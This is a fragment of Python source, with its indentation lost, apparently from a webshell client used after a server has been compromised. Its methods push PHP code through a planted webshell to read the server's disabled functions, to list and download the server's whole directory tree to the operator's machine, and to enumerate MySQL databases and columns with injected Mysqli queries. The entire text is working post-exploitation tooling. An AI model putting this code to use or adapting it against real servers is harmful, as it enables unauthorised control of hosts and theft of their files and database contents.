def get_disabled_functions(self):
if len(self.disabled_functions) != 0:
Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
return
result = self.php_code_exec_token("echo ini_get('disable_functions');")
if result[0]:
if result[1] == "":
Log.warning("No function disabled!")
self.disabled_functions = []
else:
self.disabled_functions = result[1].split(",")[0:-1]
Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
else:
Log.error("Error occured! %s" % result[1])
def download_advanced(self, path, args):
root = get_domain(self.url)
# List all dir and create them
directories = self.get_all_directories(path)
Log.success("Directories : \n%s" %
list2string(directories, "\t[", "]\n"))
Log.info("Create directories locally...")
for d in directories:
p = root + d
Log.info("Creating : [%s]" % (p))
try:
os.makedirs(p)
except Exception as e:
Log.error(str(e))
# Download
Log.info("Listing all files...")
result = self.auto_exec("find %s %s" % (path, args))
if result[0]:
Log.success("Listing files success!")
content = result[1].split("\n")[0:-1]
for file in content:
p = root + file
Log.info("Downloading %s to %s" % (file, p))
self.download_base(file, p)
else:
Log.error("Listing files error!")
def get_databases(self):
if len(self.databases) != 0:
Log.success("Database : \n" +
list2string(self.databases, "=> [", "]\n"))
return
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('information_schema');$s='select schema_name from information_schema.schemata';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
databases = content.split(",")[0:-1]
self.databases = databases
Log.success("Database : \n" +
list2string(databases, "=> [", "]\n"))
else:
Log.error("Error occured!")
def get_columns_from_table(self, tablename, database):
code = "error_reporting(0);$h='%s';$u='%s';$p='%s';$c=new Mysqli($h,$u,$p);$c->select_db('%s');$s='select column_name from information_schema.columns where table_name = \"%s\"';$r=$c->query($s); while($d=$r->fetch_array(MYSQLI_NUM)){echo $d[0].',';}$c->close();" % (
self.ip, self.username, self.password, database, tablename)
Log.info("Executing : \n%s" % code)
result = self.webshell.php_code_exec_token(code)
if result[0]:
content = result[1]
columns = content.split(",")[0:-1]
Log.success("Columns : \n" + list2string(columns, "=> [", "]\n"))
else:
Log.error("Error occured!")
